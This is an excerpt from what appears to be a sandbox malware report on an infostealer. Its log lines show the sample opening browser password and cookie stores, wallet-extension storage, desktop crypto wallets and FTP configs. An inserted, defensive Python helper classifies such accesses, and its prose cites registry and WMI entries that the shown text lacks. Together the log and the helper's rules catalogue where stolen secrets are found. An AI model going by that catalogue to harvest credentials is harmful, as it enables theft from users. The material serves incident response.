                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Armory
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\DashCore\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe Directory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
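The "File opened", "Key value queried" and "WMI Queries" entries above are what an incident responder turns into a one-paragraph impact statement: which browser credential stores, which wallet extensions and desktop wallets, which FTP clients, plus the MachineGuid read and the ROOT\SecurityCenter2 AntiVirusProduct query (the WMI class that lists registered antivirus products) used to fingerprint the host. The Python triage helper below is an added example, not part of the Joe Sandbox report and not code from the sample; it parses lines in the report's own "<source><action>: <target>" shape (the report fuses source and action, so both fused and spaced forms are accepted), buckets each access by the kind of store it touches, and flags processes that touch several store types at once. The sample lines are constructed from a handful of the entries in this section plus one benign line; the extension-ID lookup is a partial table (MetaMask, Phantom) with unknown IDs reported raw, and the three-category flagging threshold is an assumption of the example, not something the report states.

```python
"""Triage helper for sandbox 'File opened' / registry / WMI lines (added example)."""
import json
import re
from collections import defaultdict

# Constructed sample modelled on the report's "<process><action>: <target>" lines;
# the report fuses process and action, so the parser accepts both fused and spaced forms.
STEALER = r"C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe"
SAMPLE_LINES = [
    STEALER + r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    STEALER + r"File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies",
    STEALER + r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    STEALER + r"File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db",
    STEALER + r"File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json",
    STEALER + r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    STEALER + r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai",
    STEALER + r"File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
    STEALER + r"File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites",
    STEALER + r"Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    STEALER + r"WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    STEALER + r"Directory queried: C:\Users\user\Documents",
    # Constructed benign line: a single Documents access on its own is not stealer behaviour.
    r"C:\Windows\explorer.exe File opened: C:\Users\user\Documents\notes.txt",
]

LINE_RE = re.compile(
    r"^(?P<proc>.+?\.exe)\s*"
    r"(?P<action>File opened|Directory queried|Key value queried|WMI Queries):\s*"
    r"(?P<target>.+)$"
)

# Partial lookup of well-known Chrome extension IDs (32 chars, a-p alphabet), kept by the
# analyst; IDs not listed are reported raw rather than guessed.
KNOWN_EXTENSIONS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa": "Phantom",
}

CHROMIUM_PROFILE = r"\\(?P<browser>Chrome|Edge)\\User Data\\[^\\]+\\"
FILE_RULES = [  # first matching rule wins; each rule names the matched item
    ("browser_passwords", re.compile(CHROMIUM_PROFILE + r"(?P<item>Login Data(?: For Account)?)$")),
    ("browser_cookies", re.compile(CHROMIUM_PROFILE + r"(?:Network\\)?(?P<item>Cookies)$")),
    ("browser_autofill_history", re.compile(CHROMIUM_PROFILE + r"(?P<item>Web Data|History)$")),
    ("browser_extension_storage",
     re.compile(CHROMIUM_PROFILE + r"(?:Local|Sync) Extension Settings\\(?P<item>[a-p]{32})$")),
    ("firefox_profile", re.compile(
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\"
        r"(?P<item>key4\.db|cert9\.db|logins\.json|cookies\.sqlite|formhistory\.sqlite|places\.sqlite|prefs\.js)$")),
    ("desktop_wallet", re.compile(
        r"\\(?P<item>Exodus|Ledger Live|atomic|Armory|Coinomi|Bitcoin|Binance|com\.liberty\.jaxx|"
        r"Electrum(?:-LTC)?|Guarda|DashCore|WalletWasabi|Daedalus Mainnet)(?:\\|$)")),
    ("ftp_client", re.compile(r"\\(?P<item>FTPbox|SmartFTP|FTPGetter|FTPInfo|3D-FTP|FTPRush)(?:\\|$)")),
    ("user_documents", re.compile(r"\\Users\\[^\\]+\\(?P<item>Documents)(?:\\|$)")),
]


def parse_line(line):
    """Split one report line into (process, action, target); None if it is not one we handle."""
    m = LINE_RE.match(line.strip())
    return (m.group("proc"), m.group("action"), m.group("target").strip()) if m else None


def classify(action, target):
    """Return (category, item) for a credential-store or fingerprinting access, else None."""
    if action == "Key value queried" and target.endswith("MachineGuid"):
        return "host_fingerprint", "MachineGuid"
    if action == "WMI Queries" and "AntiVirusProduct" in target:
        return "av_enumeration", "SecurityCenter2 AntiVirusProduct"
    if action not in ("File opened", "Directory queried"):
        return None
    for category, pattern in FILE_RULES:
        m = pattern.search(target)
        if not m:
            continue
        item = m.group("item")
        if category == "browser_extension_storage":
            item = KNOWN_EXTENSIONS.get(item, item)
        browser = m.groupdict().get("browser")
        return category, (f"{browser}: {item}" if browser else item)
    return None


def summarize(lines):
    """process -> category -> sorted unique items; lines with no category are dropped."""
    acc = defaultdict(lambda: defaultdict(set))
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, action, target = parsed
        hit = classify(action, target)
        if hit:
            acc[proc][hit[0]].add(hit[1])
    return {p: {c: sorted(v) for c, v in cats.items()} for p, cats in acc.items()}


def stealer_candidates(summary, min_categories=3):
    """Processes touching several distinct store types; the threshold is an assumption."""
    return sorted(p for p, cats in summary.items() if len(cats) >= min_categories)


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_LINES), indent=2))
```

Run against a full report export, the per-process breakdown is what distinguishes a browser legitimately rewriting its own profile (one category, its own process) from a stealer like the one here, which touches passwords, cookies, extension storage, Firefox NSS files, desktop wallets and FTP client configs from a single dropped binary.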

                    Remote Access Functionality

                    Source: Yara match File source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: vn6ZAuKJ8m7U3.exe PID: 6776, type: MEMORYSTR
                    Source: Yara match File source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: 00000005.00000002.2574422459.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2574561504.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
